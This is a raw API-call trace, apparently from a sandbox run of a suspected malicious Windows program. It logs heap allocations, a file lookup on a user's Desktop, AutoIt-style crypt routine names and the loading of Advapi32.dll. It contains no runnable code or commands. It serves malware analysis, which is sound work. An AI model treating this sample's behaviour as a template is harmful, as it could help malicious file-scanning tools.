lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0188.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0188.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0188.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0188.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0188.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0188.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0188.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0188.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0188.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0188.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0188.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0188.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0188.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0188.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0188.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0188.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0188.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0188.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0188.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0188.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0188.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0188.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0188.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0188.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0188.071] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Ljw5WYRO6Wy.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808ff990, ftCreationTime.dwHighDateTime=0x1d5e4f4, ftLastAccessTime.dwLowDateTime=0xa25dbf30, ftLastAccessTime.dwHighDateTime=0x1d5eae9, ftLastWriteTime.dwLowDateTime=0xa25dbf30, ftLastWriteTime.dwHighDateTime=0x1d5eae9, nFileSizeHigh=0x0, nFileSizeLow=0x1267, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Ljw5WYRO6Wy.mp3", cAlternateFileName="LJW5WY~1.MP3")) returned 0xa87690 [0188.072] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0188.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0188.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0188.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0188.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0188.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0188.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0188.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0188.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0188.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0188.073] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0188.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0188.073] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0188.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0188.074] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0188.074] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0188.074] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0188.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0188.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0188.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0188.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.075] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0188.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.075] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0188.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.076] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0188.076] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0188.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.077] 